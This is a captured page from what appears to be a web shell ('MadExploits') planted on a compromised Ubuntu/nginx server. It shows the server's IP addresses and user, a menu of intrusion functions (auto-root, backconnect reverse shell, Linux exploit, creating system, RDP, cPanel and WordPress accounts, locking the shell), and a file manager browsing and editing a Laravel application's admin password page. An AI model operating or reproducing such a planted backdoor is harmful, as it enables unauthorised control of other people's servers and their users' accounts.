Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sifaris /
resources /
views /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
access
[ DIR ]
drwxrwxr-x
address
[ DIR ]
drwxrwxr-x
admin_users
[ DIR ]
drwxrwxr-x
app_users
[ DIR ]
drwxrwxr-x
categories
[ DIR ]
drwxrwxr-x
dashboard
[ DIR ]
drwxrwxr-x
fiscal
[ DIR ]
drwxrwxr-x
layouts
[ DIR ]
drwxrwxr-x
offices
[ DIR ]
drwxrwxr-x
priorities
[ DIR ]
drwxrwxr-x
reports
[ DIR ]
drwxrwxr-x
sifaris_forms
[ DIR ]
drwxrwxr-x
sifaris_records
[ DIR ]
drwxrwxr-x
spatie
[ DIR ]
drwxrwxr-x
statuses
[ DIR ]
drwxrwxr-x
change_password.blade.php
2.39
KB
-rw-rw-r--
dashboard.blade.php
579
B
-rw-rw-r--
forgot-password.blade.php
712
B
-rw-rw-r--
login.blade.php
2.88
KB
-rw-rw-r--
media_manager.blade.php
606
B
-rw-rw-r--
my_profile.blade.php
1.12
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : change_password.blade.php
@extends('admin.layouts.master') @section('title')Change Password @endsection @section('content') @php @endphp <div class="row mb-2"> <div class="col-sm-6"> <h1 class="h3">Change Password</h1> </div> <div class="col-sm-6"> <a href="{{ route('admin.my_profile') }}" class="btn btn-success float-end"><i class="far fa-arrow-alt-circle-left"></i> Back to My Profile</button></a> </div> </div> <div class="row"> <div class="card p-3"> @include('admin.layouts.alert') <form action="" name="addform" id="addform" method="post"> @csrf <div class="row mt-3"> <div class="col-md-4"> <div class="form-group"> <label class="py-2">Current Password * </label> <input class="form-control" type="password" name="current_password" /> </div> </div> </div> <div class="row mt-3"> <div class="col-md-4"> <div class="form-group"> <label class="py-2">New Password * <small class="text-danger">Minimum 8 characters</small> </label> <input class="form-control" type="password" name="new_password" /> </div> </div> </div> <div class="row mt-3"> <div class="col-md-4"> <div class="form-group"> <label class="py-2">Confirm Password * <small></small> </label> <input class="form-control" type="password" name="confirm_password" /> </div> </div> </div> <div class="form-group mt-3"> <button type="submit" class="btn btn-primary"><i class="icon-ok-sign"></i> Submit</button> <a href="{{ route('admin.my_profile') }}"> <button type="button" class="btn btn-danger "><i class="icon-remove-sign"></i> Cancel</button></a> </div> </form> </div> </div> @stop
Close